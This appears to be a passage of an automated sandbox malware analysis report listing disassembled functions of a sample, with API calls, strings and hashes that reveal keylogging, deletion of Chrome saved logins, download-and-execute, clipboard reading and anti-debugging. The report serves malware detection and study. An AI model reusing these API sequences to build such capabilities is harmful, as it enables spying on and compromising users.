                        • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                        • GetProcAddress.KERNEL32(00000000), ref: 00416872
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                        • String ID: !D@$PowrProf.dll$SetSuspendState
                        • API String ID: 1589313981-2876530381
                        • Opcode ID: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                        • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                        • Opcode Fuzzy Hash: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                        • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                        Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                        • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                        • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID: ACP$OCP$['E
                        • API String ID: 2299586839-2532616801
                        • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                        • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                        • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                        • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                        Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                        • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                        • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                        Strings
                        • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleOpen$FileRead
                        • String ID: http://geoplugin.net/json.gp
                        • API String ID: 3121278467-91888290
                        • Opcode ID: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                        • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                        • Opcode Fuzzy Hash: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                        • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                        Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                        • GetLastError.KERNEL32 ref: 0040BA58
                        Strings
                        • [Chrome StoredLogins not found], xrefs: 0040BA72
                        • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                        • UserProfile, xrefs: 0040BA1E
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteErrorFileLast
                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        • API String ID: 2018770650-1062637481
                        • Opcode ID: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                        • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                        • Opcode Fuzzy Hash: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                        • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                        Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                        • GetLastError.KERNEL32 ref: 0041799D
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                        • String ID: SeShutdownPrivilege
                        • API String ID: 3534403312-3733053543
                        • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                        • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                        • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                        • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                        Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                        Download Yara Rule
                        APIs
                        • __EH_prolog.LIBCMT ref: 00409258
                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                        • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                        • FindClose.KERNEL32(00000000), ref: 004093C1
                          • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                          • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                          • Part of subcall function 00404E26: FindCloseChangeNotification.KERNELBASE(?), ref: 00404E4C
                        • FindClose.KERNEL32(00000000), ref: 004095B9
                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$Close$EventFileObjectSingleWait$ChangeException@8FirstH_prologNextNotificationThrowconnectsend
                        • String ID:
                        • API String ID: 2435342581-0
                        • Opcode ID: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                        • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                        • Opcode Fuzzy Hash: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                        • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                        Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                        Download Yara Rule
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                        • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ManagerStart
                        • String ID:
                        • API String ID: 276877138-0
                        • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                        • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                        • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                        • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                        Function 00451CD8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
                        • _wcschr.LIBVCRUNTIME ref: 00451E4A
                        • _wcschr.LIBVCRUNTIME ref: 00451E58
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                        • String ID: sJD
                        • API String ID: 4212172061-3536923933
                        • Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                        • Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
                        • Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
                        • Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769
                        Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                          • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                          • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                        • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                        • ExitProcess.KERNEL32 ref: 0040F8CA
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseExitOpenProcessQuerySleepValue
                        • String ID: 5.0.0 Pro$override$pth_unenc
                        • API String ID: 2281282204-3992771774
                        • Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                        • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                        • Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                        • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                        Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                        Download Yara Rule
                        APIs
                        • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                        • wsprintfW.USER32 ref: 0040B1F3
                          • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: EventLocalTimewsprintf
                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                        • API String ID: 1497725170-248792730
                        • Opcode ID: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                        • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                        • Opcode Fuzzy Hash: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                        • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                        Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                        Download Yara Rule
                        APIs
                        • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
                        • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                        • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                        • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Resource$FindLoadLockSizeof
                        • String ID: SETTINGS
                        • API String ID: 3473537107-594951305
                        • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                        • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                        • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                        • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                        Function 00409665 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                        Download Yara Rule
                        APIs
                        • __EH_prolog.LIBCMT ref: 0040966A
                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                        • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstH_prologNext
                        • String ID:
                        • API String ID: 1157919129-0
                        • Opcode ID: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                        • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                        • Opcode Fuzzy Hash: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                        • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                        Function 0040880C Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                        Download Yara Rule
                        APIs
                        • __EH_prolog.LIBCMT ref: 00408811
                        • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                        • String ID:
                        • API String ID: 1771804793-0
                        • Opcode ID: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                        • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                        • Opcode Fuzzy Hash: 343675e76b0a0f9536e7689d5bfc322d86527155193a82fc771824cafc66db2c
                        • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                        Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                        Download Yara Rule
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DownloadExecuteFileShell
                        • String ID: C:\Users\user\AppData\Roaming\jdSldfVS.exe$open
                        • API String ID: 2825088817-2630512652
                        • Opcode ID: 8341db3bc302fba65028eb5830d70bd40add62ae0f2dccab7f4c30313c030271
                        • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                        • Opcode Fuzzy Hash: 8341db3bc302fba65028eb5830d70bd40add62ae0f2dccab7f4c30313c030271
                        • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                        Function 0040783C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                        Download Yara Rule
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407857
                        • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040791F
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileFind$FirstNextsend
                        • String ID: XPG$XPG
                        • API String ID: 4113138495-1962359302
                        • Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                        • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                        • Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
                        • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                        Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                        Download Yara Rule
                        APIs
                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                          • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                          • Part of subcall function 0041376F: RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                          • Part of subcall function 0041376F: RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateInfoParametersSystemValue
                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                        • API String ID: 4127273184-3576401099
                        • Opcode ID: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                        • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                        • Opcode Fuzzy Hash: 3c2d205688c6346916b5703b91afcadbe5e4724bf31c27c5056ca6af97e88c58
                        • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                        Function 004461F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 464COMMONLIBRARYCODE
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: PkGNG
                        • API String ID: 0-263838557
                        • Opcode ID: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                        • Instruction ID: a89a86a7c059f2ce1b75669fee0c4fca3fa64158462c9470c468cddaecc71d09
                        • Opcode Fuzzy Hash: 3af37b45e0065d2a9e4b628ca9eba3ad08e75ba8402ba2670485150a8c7006c8
                        • Instruction Fuzzy Hash: FB025D71E002199BEF14CFA9D8806AEBBF1FF49324F26416AD819E7344D734AE41CB85
                        Function 004520C3 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                          • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorInfoLastLocale$_free$_abort
                        • String ID:
                        • API String ID: 2829624132-0
                        • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                        • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                        • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                        • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                        Function 0043BB22 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                        • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                        • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                        • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                        Function 00433837 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                        Download Yara Rule
                        APIs
                        • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,004334BF,00000034,?,?,00000000), ref: 00433849
                        • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?), ref: 0043385F
                        • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,PkGNG,00433552,?,?,?,0041E251), ref: 00433871
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Crypt$Context$AcquireRandomRelease
                        • String ID:
                        • API String ID: 1815803762-0
                        • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                        • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                        • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                        • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                        Function 0040B70E Relevance: 4.5, APIs: 3, Instructions: 19clipboardCOMMON
                        Download Yara Rule
                        APIs
                        • OpenClipboard.USER32(00000000), ref: 0040B711
                        • GetClipboardData.USER32(0000000D), ref: 0040B71D
                        • CloseClipboard.USER32 ref: 0040B725
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Clipboard$CloseDataOpen
                        • String ID:
                        • API String ID: 2058664381-0
                        • Opcode ID: c799312c980d18205df260c4494eeab96c1e87453cdfeac26beaa605c81e592b
